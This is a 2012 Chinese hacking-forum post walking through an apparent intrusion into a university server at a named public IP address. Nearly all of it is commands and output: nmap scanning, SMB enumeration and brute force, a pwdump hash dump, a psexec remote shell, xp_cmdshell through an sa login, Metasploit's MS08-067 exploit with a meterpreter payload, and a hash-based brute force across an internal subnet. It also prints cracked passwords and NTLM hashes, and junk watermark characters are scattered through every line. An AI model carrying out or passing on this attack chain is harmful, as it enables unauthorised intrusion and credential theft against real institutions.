找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3009|回复: 0
打印 上一主题 下一主题

nmap+msf入侵广西师范

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 12:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
广西师范网站http://202.103.242.241/  T& m# I  x2 m
5 D) x/ `5 d! l$ a, T4 A4 I6 v
root@bt:~# nmap -sS -sV 202.103.242.241, ]& }8 T  {; O9 T$ r
+ }* o% c0 k6 c7 i1 M; }
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST7 B# T7 w* `3 L3 w

7 O; ~4 W% Y) f/ ~. ?Nmap scan report for bogon (202.103.242.241)4 p, s: d9 @6 D  {4 h8 M* I
# U* ^; ]0 ]$ H  ~  [
Host is up (0.00048s latency).
4 _, q! o- _/ k( _1 c# o- b
. X) V- k2 H# V7 }# ]+ KNot shown: 993 closed ports  B+ I; N7 F9 ]; d% j3 B
- w. [1 ]. \4 u  u/ Z* n6 G: R
PORT     STATE SERVICE       VERSION
- Z2 D7 z2 ]5 m; W1 j2 q
: `, Z* Q- u! S0 O" ?% }135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
# v  e0 ]/ g; u! J& u; J6 {8 W$ U" }0 e
139/tcp  open  netbios-ssn
- g- U  B. O: H3 t+ G; R8 V$ T9 G: \" W3 a
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
8 j$ |1 D9 w/ T) W5 e
/ s/ v0 {  c6 W/ @: P  C2 G4 L" }1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
1 O" i) L6 j: b. ~. {/ m
; N3 L: ?7 a$ t) Y5 Y1026/tcp open  msrpc         Microsoft Windows RPC
6 K" D9 ]5 J8 }, h+ M) G& _) o$ n7 s1 [: a; V; N
3372/tcp open  msdtc?' c! ^  p* X' J9 Y
, V6 J2 `6 g8 S$ S, g' U9 n
3389/tcp open  ms-term-serv?
* D2 [7 B' P1 N7 A3 l' d: y! p1 t( l5 ]; E# l0 F
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :" Y- F8 s2 R  x, R4 [" k0 ~  o6 i
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r: b5 A* T5 ]  C, i7 ?) H

7 y" I$ F9 [- L' Q, ~* hSFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions! w7 T7 X. {' v5 ^/ X- S1 z
9 ~5 n9 Q/ E7 |, |- [- |* V9 H$ t
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
! y  p# Y7 ^" V( Q4 B" f3 S2 g& s& n+ D
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO( L* i6 Y% B5 T% b5 b
$ x1 r$ q, e$ ]3 X( ~$ X
SF:ptions,6,”hO\n\x000Z”);
2 u; e' c. Y+ y2 y4 F( i: ?  [1 |1 U2 ?. a3 g7 |' O
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems): s* B3 ^' j# c5 S
# L! p; |" F( [* y. O8 o: ?% `1 _& v
Service Info: OS: Windows
- k; Q! t! V# g5 k- B0 N, u8 b+ S% d3 L8 ]0 F
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
/ s6 w1 q6 c% l
$ Y' {4 w2 F/ b1 b4 {2 e; ]9 ?Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
, n* P+ Z, T$ H1 U! d, |5 U, W* P, T% h( i/ Y& |
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本# `+ a8 R5 ^2 ~

5 w: a% A) i2 N-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse( i( v  c; H. j. j% b7 k( j
3 o5 l2 y3 D+ ]4 Y" S& ~
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse" X1 w8 i9 a  W$ Z, [1 _% b

8 [6 R9 F/ Z5 y; S$ z% G9 t-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse& W* u/ {. U2 R% x

( Y9 N. d+ E& N, q( _. e* D) q-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
3 O9 ~, c* e/ H8 P+ a/ i% ]6 L8 N/ j% d
-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse5 e5 d1 ~0 @3 |  l8 G( f4 l

9 w$ C! E0 d  E6 S-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse) S% h2 J! z; x+ V! H4 a

' }/ K1 n! {0 o-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
; ^" O+ |+ a3 I& Y4 j" h  o8 ^
6 D1 j: P) ?! A& s+ L-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse% X9 Z$ ?6 d' c1 s4 ~. t- N9 J

. a% E* l( M5 ~) @3 e, x& s" I8 [-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse8 n$ \. a3 o1 `( B# E
8 X1 x/ d) l  C) A$ C, X
-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse5 T( a! S( V; v, W* z4 _% r
  H9 d  D) o& g0 ?7 Q
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
! n) W7 C. |) l
0 n& z4 s1 {3 U7 E% e-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
8 l: S- V' Q( T& C" u; V- ^1 a5 B( p4 R+ E
-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
. {# ~" Y) v5 Q9 W: N( m7 I0 f; r9 P% O, \4 c8 u1 `
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
1 o" B& A: C' x' Q& P% I1 C: E% t: N+ z- e- @
-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
: e: n5 @$ c2 w) n5 X' o; |0 ^0 m$ q
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   3 ^* ~# f$ `! A: H( J& _( i6 N* W# p
0 }" A7 ~- H  y; h4 r
//此乃使用脚本扫描远程机器所存在的账户名: ?5 N0 t6 N. u$ }9 P, i

7 U2 L$ l) u% p- m$ JStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST; ?7 A# w0 f5 I& i, @; W8 P

) v* p5 k# G( Z5 W/ q% B- f- TNmap scan report for bogon (202.103.242.241), o7 g( d. P9 _5 y! y

, t! |. D/ K& |Host is up (0.00038s latency).& _5 M6 p- \% Z
- v9 Y4 ~& r- [# M
Not shown: 993 closed ports
: R5 Z$ v3 j6 X4 S7 T
8 v/ H6 k. l3 N2 t# P+ ^" pPORT     STATE SERVICE8 f& G/ Y7 W8 N4 r& K
( e" _5 X) `2 _
135/tcp  open  msrpc
& D3 B9 G- s: \
/ G1 \  t7 j( ]3 z' {/ s" ~5 K139/tcp  open  netbios-ssn: r+ Z; d/ s/ i! \
0 m/ C3 p8 B- h: w. e: e9 S
445/tcp  open  microsoft-ds. {2 D( u, S' R9 H2 Y

+ b! T" h+ ?$ z: n: O2 }# x, B1025/tcp open  NFS-or-IIS7 z/ r/ Z- R: b$ l" g4 r% `

6 `, U# _: u# p* L; _$ `; Y1 ^1026/tcp open  LSA-or-nterm) H; I1 W. d/ ]* m* f

+ c& o& y& H3 D/ i9 A+ T# T3372/tcp open  msdtc1 u+ I. W) E' K. Y8 p7 M! w0 S
) {4 A1 S' v4 A9 Y4 L5 w
3389/tcp open  ms-term-serv
( F: d. m! s- t$ ]4 }6 \0 V$ W/ Y8 X: l4 ^" y, b/ j
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)0 s9 }! I4 R" N$ k7 @

5 _9 }8 i4 _9 }# w, J  h' E2 T1 @5 m# fHost script results:
: Q" R/ G1 n5 k' p; j' {& ~4 X' w/ a7 Q9 r4 F1 ?( J
| smb-enum-users:
/ g$ @. e& i! e) [6 n
) G  c" a4 s. Q8 G: b' K! g|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果" |6 B$ H( R+ L) h8 L* ?4 `" ~

, ^5 k/ f$ C& I5 ^$ a+ @Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
; U3 _& s, z2 v# Y" i1 H4 o1 `1 m/ L- P2 C2 Y  i
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
$ q) B( b' @/ ?+ Y& ]% `/ q  M* E5 R3 U! M; U+ ~7 k
//查看共享
3 s1 h( y% E- t2 s% C& B5 u0 u! j+ e  T2 V, |8 Y
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST( I5 S. ]. K7 }8 O" L
+ n6 N! z9 g. o) \5 r
Nmap scan report for bogon (202.103.242.241)
( j' j) G; i4 l- f: ^# ^
9 X1 u- g8 @8 q4 BHost is up (0.00035s latency).6 ~8 M! p1 V  ?, x0 }

7 @4 E. R5 o- Z+ {Not shown: 993 closed ports8 X$ _! s- o' T1 t3 w+ U' T

- N9 d( I. n& o3 v' k& LPORT     STATE SERVICE
6 L, Z- F, k( `# f4 K8 K( B; o* k7 I! o- P0 t* `$ s3 }9 k  x$ m
135/tcp  open  msrpc
/ K6 w$ T; l0 q+ ?/ l2 h1 U- F7 A0 a; |. @% H
139/tcp  open  netbios-ssn
# D5 n3 f$ J8 g5 ]# C
5 N. [* L6 v# O) ~1 D$ _" E9 E% g445/tcp  open  microsoft-ds
, R/ ^0 |( q4 |" s
  o- j8 t( N& F/ s1025/tcp open  NFS-or-IIS
3 j% W1 N4 g5 F4 J$ h9 d% D! C$ j
1026/tcp open  LSA-or-nterm
: F5 {, ?( a- |3 W% P
4 t' W7 s0 ]. Q% H2 [; O, e0 i) y# [$ K* A3372/tcp open  msdtc1 l& G( }7 b' I: X5 [8 `

' g# {" |1 N; s3389/tcp open  ms-term-serv3 y( M; l* I* X# u( ^# }4 K$ i9 y
+ a' x5 Z/ u  ?+ y3 v0 H
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)0 I3 n2 v0 \8 \. h  f! P+ h1 e

  Y1 H( E& |! W( x4 K( u4 F# w$ BHost script results:
! W' [7 L& p1 v& J5 R: A0 _( R& b
| smb-enum-shares:
, l0 R! t: b3 D; L1 J. w/ i
$ \& }) w: N7 W& F  {: v6 p  L|   ADMIN$4 [- p: V  l+ i& b3 ^5 i9 u: `
  a. ^/ B2 U  i; _1 }6 G% d
|     Anonymous access: <none>
, A7 ^4 a/ w! ]9 }( r* T0 q' y2 v
|   C$
- M! F. F% q- j' m: j3 E# C- U8 |8 c: D7 o& ]- F- y
|     Anonymous access: <none>
5 h2 u0 F: c0 Z& O9 e8 ^
+ Z( ~# Q5 i9 q: t+ h|   IPC$
2 _, ?! j/ }* f1 C' `' @& r1 I4 r5 `6 t4 f
|_    Anonymous access: READ
& O" V$ `$ h8 |- j7 [' H: l( h4 l6 O1 f& _
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds" f+ X) \, N5 S6 m* m0 }
1 |! h4 {2 Q6 g
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241      
; Z9 q% Q7 ^' m! C' E/ ~4 B, M: b3 H
! G' ]- g( s- y$ j5 G//获取用户密码/ ^9 w( R7 X+ F3 U8 g+ _

8 {2 D% o8 J- |Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST3 M; O9 ?  ^. Q7 h" J+ Q

8 e, g5 ^; o# F( vNmap scan report for bogon (202.103.242.2418)
* @$ a/ c# a1 u- Z
7 C% w  t" A9 T5 C6 `8 aHost is up (0.00041s latency).! h* M' k. m+ @( w- X- I) O. i

* A; v! S0 Y" ]& XNot shown: 993 closed ports; g) o, [5 c1 {) d: l  I8 s
4 e8 z0 ]# q2 a* R
PORT     STATE SERVICE
& E9 ^/ c/ x0 n. n) F- C2 g. \' p" t  q+ P
135/tcp  open  msrpc* d1 h: k+ k* D
3 \' ~2 d4 Z9 {
139/tcp  open  netbios-ssn
% f" w# }' @$ B1 Z' n2 ?" p
: i* y0 q  l) f- s: h445/tcp  open  microsoft-ds
" \+ E, C. i7 |/ i/ `  F) t) M+ F2 p3 B. \
1025/tcp open  NFS-or-IIS
. z4 G' r9 d" M& h5 ?" j
2 O; Q% K# J. Y! L0 O1026/tcp open  LSA-or-nterm3 c; [4 L, G; Y- K3 P1 i$ [

( ]1 J8 R; e7 l6 K* Q4 D0 F2 m) s& B3372/tcp open  msdtc
: ~, ?: |3 |- e5 p9 @
& N; F& }  Y0 J  D7 L3389/tcp open  ms-term-serv
( @  z$ O$ l$ [* d0 Q; F+ i
, ^" `( I+ [# F6 ~; yMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems). l. Y5 h) A1 X/ o

' L6 U! s2 l7 r. ^: ]Host script results:
8 r+ X7 e0 n1 ]
& o1 \3 a* \# u$ X; }7 n" w6 T* B0 `| smb-brute:) N) w, F) f8 @4 w
! D  b9 h( A* S7 C9 x
administrator:<blank> => Login was successful/ J8 V4 c* W6 ~) D4 G0 j2 G

! W+ t4 H; V+ U& t# O! b|_  test:123456 => Login was successful
5 t" m2 ?: [' `) \: |# M2 p  A1 y/ b& f$ }0 N1 q. l
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
3 \* W# F5 c$ |5 f
- a, t/ A$ Y: W( U' t  m3 Rroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash+ p0 P. I$ C& i! ~+ A; ^# X

: L& X- v" Y8 A) Rroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
4 ~4 B& R* M7 {- F: i
0 B% F' w0 X. Q. y1 C. `root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
) f9 ^" B" U2 A, V2 d# W) R- Z% r  @! U. V) U: y
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1397 c7 d+ U+ L: X+ S1 p0 x4 h2 Y
9 N+ ?! B$ x0 F7 S
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST- f# }. S# S' ~7 {! [. k

( l) C% j  t# a8 Y' Y$ M2 a, yNmap scan report for bogon (202.103.242.241)4 n. X: b8 F9 X9 ?/ \7 E5 O

3 n( m% P7 |) D1 H5 {* wHost is up (0.0012s latency).
1 ]" @2 h, p( i3 V' j' K% [: C% N. d' y. B  A1 N1 \/ X' i6 d
PORT    STATE SERVICE$ X- X" {# ?: F2 `  M4 M

+ N% w, T9 d- r1 e7 z135/tcp open  msrpc' L1 _8 m& a3 y/ r: x

- C. c( Z8 {0 R3 p# R139/tcp open  netbios-ssn
' b! `3 I6 H4 ^" g* V
: H# q  M2 X. Q" w% b$ }445/tcp open  microsoft-ds
; M' W9 o: O, z2 ?! @. J# L- K
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 t; l1 i$ w) j) a2 c* M( K
" C# Y3 k% n9 gHost script results:
" P- Z/ r, I8 L8 z' @% B
7 f. b* j3 j' R. Y& E| smb-pwdump:
" ]% n1 H9 a: m# s0 r5 b4 o
* k7 N, o8 k+ Z| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
3 }5 f/ h& C/ F8 p2 q8 J/ Z) }' S( J; Z
| Guest:501 => NO PASSWORD*********************:NO PASSWORD********************** p! B2 r* G9 Q+ d
. F/ M- ]0 a/ l5 T8 Y) A
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D44 v% `: V; T: T- n" c4 H

  h( V1 b) q* U( u- R' a|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
; q- j  V  n0 r
; q- G8 _- r2 [1 @5 g- u# pNmap done: 1 IP address (1 host up) scanned in 1.85 seconds# I/ A. r* G1 n/ b. f  E" R
  k6 E7 U8 K5 }) s& B. e
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell& K" h( t8 u6 @( C8 s9 \

% F  U5 |2 A$ u' M- M-p 123456 -e cmd.exe
" s( G5 `, s( A3 X0 ~0 G0 o% Q# H0 D9 ]( x+ c) s+ q' S& r6 P) l' j
PsExec v1.55 – Execute processes remotely. A9 y( `3 n# h) A3 `

9 a( T, M# f* r0 X+ c5 jCopyright (C) 2001-2004 Mark Russinovich$ |" D7 t6 e- k- Z
8 d( s, `  e7 P5 g1 U5 z) z  S
Sysinternals – www.sysinternals.com1 c7 z' ]4 q8 ]" R" P
& q1 ^) N' Q7 m/ B
Microsoft Windows 2000 [Version 5.00.2195]/ [- z, z( A" M: B

6 |/ g' r7 _* b/ `: u) {# M4 h% e(C) 版权所有 1985-2000 Microsoft Corp.
! C( b' k) s8 k9 x
, }9 f% v. Q" ^# \C:\WINNT\system32>ipconfig5 K5 @/ Q! u" m
$ Q% d# m) x! s; E% V
Windows 2000 IP Configuration
! z9 }5 a# o. s  Y* T  S# U$ U
- C" _4 o+ a5 v5 G1 DEthernet adapter 本地连接:
  u  m  {  X2 f' Z+ `# M. O
; W+ K* r! L/ c  ?5 y% `; oConnection-specific DNS Suffix  . :
! A5 u; V- L- _( x3 ^: M$ x
9 I! Y$ |4 ]8 j1 e3 JIP Address. . . . . . . . . . . . : 202.103.242.241
! X/ q; ~) N2 Y& e8 P9 _3 K% v  C7 M9 V9 v1 D; N  ^
Subnet Mask . . . . . . . . . . . : 255.255.255.0
9 \# i6 x2 p) z$ T3 C$ @
# ]* w) T3 p! c( u2 ?( dDefault Gateway . . . . . . . . . : 202.103.1.1/ D6 z" Q3 `5 k2 W( D
! |& j- a0 ]0 A: n6 z+ m- b+ ]
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令
# I6 E" v* d1 F0 l; v" m( _" U8 O- W
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞+ m. N8 X4 G3 G2 T( j
3 ^& n2 L2 f: T3 ~. q
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST$ P1 K0 x$ x  e% u' e6 ~

6 ~# }( @2 x  w1 o% F7 }Nmap scan report for bogon (202.103.242.241)
* k! j6 ^: x1 K) P( Y4 \* F0 e; f. E! b/ V" v' L! y* x! P9 q' w+ R
Host is up (0.00046s latency).! C1 f# ]. P; M* Z" r9 p( Z& K- Y( _

* Q5 D9 Y. w! M9 h5 yNot shown: 993 closed ports4 d, U$ T  ?2 t1 r: j1 J. }

; h4 N% G2 s* X( ~! g: T, U! b# H6 Z& APORT     STATE SERVICE1 B( e9 k8 Q4 P4 m7 m& b
  f0 j/ E" Y! {1 s. u9 V# L1 m2 W
135/tcp  open  msrpc
5 f9 D* t7 d; j  ~- u& v1 x( _2 L3 t! ^& c0 ^: t6 \% K
139/tcp  open  netbios-ssn) m& e1 @5 [+ k6 }! Z
1 u8 H) t' b$ I: V# ~
445/tcp  open  microsoft-ds" _" s2 n- H6 v) U" n( M. j4 v

* j+ q9 O5 a6 H4 R. M" S1025/tcp open  NFS-or-IIS
. B7 O0 A, S2 g9 }4 e8 ?$ o9 v1 ?: N& I  W7 h5 d: m- F
1026/tcp open  LSA-or-nterm
% H& r' r' y. {" g6 o1 g0 s- |0 E& T3 ^/ J. C( W8 S
3372/tcp open  msdtc
- z  z/ A: m2 c8 p3 {+ B  O( y. l, S3 B) ~; _2 P
3389/tcp open  ms-term-serv9 k1 p* _0 K: V3 ^1 X& t# e
* R$ |- |9 ]! J& j6 |
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
; i7 ?, n- X4 F4 f. d6 |1 b, k6 Z8 E, G# V
Host script results:) b& P$ y: K' q3 a/ `

* t% M3 p0 B/ u* }: b| smb-check-vulns:/ d& z  u4 z1 ]( f  I; W

+ `" U0 C6 F# f: f; p% J|_  MS08-067: VULNERABLE
; `4 [" W3 r' K% o0 j; l1 _, q8 ^% r+ L' ^! i& n) u, }; [! L( U
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
: `* t1 l9 G* ?3 [0 S: Y3 U/ t+ N2 W% n2 O8 {1 v% q8 Z' G
root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出' `2 {# J/ r  k

; t0 D9 y% |% c4 a. v- hmsf > search ms084 ^3 q  H* l5 \: j2 I' d' B7 a$ ?

- O  _& l( S4 W/ h1 Wmsf > use exploit/windows/smb/ms08_067_netapi
7 T' R; E& k& G4 D! Z( F& u& [  B( h; D  n
msf  exploit(ms08_067_netapi) > show options& H$ T* O1 a* X
9 o0 E: F# ?  j
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
0 t! G# {+ r$ j' s9 \) l# \% X% L* d" G1 `3 z4 d' ?' o( w0 A
msf  exploit(ms08_067_netapi) > show payloads% Y' o( H: x1 H$ p% z
! U/ e  g0 {+ V4 `; M. A
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp  q8 [' g0 W" W5 e

" Z, C) M, H- G) t/ N) }: ^msf  exploit(ms08_067_netapi) > exploit
: \+ L. n5 a+ j& x: r8 m: V$ f& r+ w2 B8 F4 M3 N' }
meterpreter >) x- T! M) ]) r6 B  s
1 H; g4 l  O) h' ]" }
Background session 2? [y/N]  (ctrl+z)
# _8 {0 J+ A: I% w4 K8 T, u. V  u8 |
msf  exploit(ms08_067_netapi) > sessions -l. O5 T% c! U8 W6 g

) T4 Q4 Q# T+ X- `# Proot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
, n! z! O+ d7 v- z5 u4 M. n7 V9 L( E$ W2 J, w( d: A" L
test
: i% D7 M9 @4 Q8 g9 @( S, P& z$ @, H& ~+ C
administrator; j; t6 z* f+ \; Z2 ~
: A* R' l' D" p5 }6 S/ c
root@bt:/usr/local/share/nmap/scripts# vim password.txt
, i0 q  b: Z2 D& M# \+ z" F0 Q3 P% t' ]
44EFCE164AB921CAAAD3B435B51404EE# J! B+ K7 l# f4 d/ I6 i

: y( n- U+ Z6 u1 kroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
7 u( g  G  `9 {, n: b+ \
+ e1 Y. T( L6 i, C3 W //利用用户名跟获取的hash尝试对整段内网进行登录- _. W& N8 u( u; E' Y; d
# ]( L' p. y/ j* ]: }4 q$ D
Nmap scan report for 192.168.1.105
6 O, V- m0 H! X$ t, R' ]' q# p/ L0 y+ t. w- ~' v
Host is up (0.00088s latency)./ I$ {) [5 V' F
3 J! l! G& a1 m$ T4 `/ j
Not shown: 993 closed ports
! ^2 ?. }  h3 g/ V4 P
7 _1 Z. \4 ?2 Y  PPORT     STATE SERVICE
( o7 f$ I- o9 N$ }5 O  h3 s- F0 @7 ]4 L" }
135/tcp  open  msrpc3 x: B& J8 |# S; {% a/ o
* g+ R2 Z6 G6 A9 b2 S8 V
139/tcp  open  netbios-ssn3 C  V7 {/ W8 j( v% h+ D
0 M3 R! ?: v# J! H
445/tcp  open  microsoft-ds4 Q/ h; G* D  `( X; M- l
! y  \) @# }5 P4 {0 e# A# \
1025/tcp open  NFS-or-IIS4 o# H2 _6 A' `! O  x
- f0 c% f+ s2 t8 {
1026/tcp open  LSA-or-nterm0 p1 H# B7 E, u) q6 F/ r  R" D
2 y1 f" {; B2 F8 G
3372/tcp open  msdtc
6 c! q& f, b# G- \, w9 e  e8 y$ J
3389/tcp open  ms-term-serv
6 T. z5 I: z- Q( q5 J8 ]: T7 Z6 H* a$ @/ k; j' x
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# }/ d: |9 ^7 K; P4 G2 H7 `

0 Y1 w" b9 U+ F3 G- XHost script results:4 G% e4 R% G' i- G- X

3 m2 K8 y  n# v$ w0 }| smb-brute:
. i2 L/ _( g) ~. u* N, c6 t
# D2 N/ a! M, F$ n' t. n! E* n|_  administrator:<blank> => Login was successful# c, t. \, Y) z

; ]8 |* F' d' U, h# I# ?/ H8 H攻击成功,一个简单的msf+nmap攻击~~·4 p. H% Z5 t- g5 i  i3 s$ J- [
4 k5 r# k: q' x: L6 T" U. }. g  M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表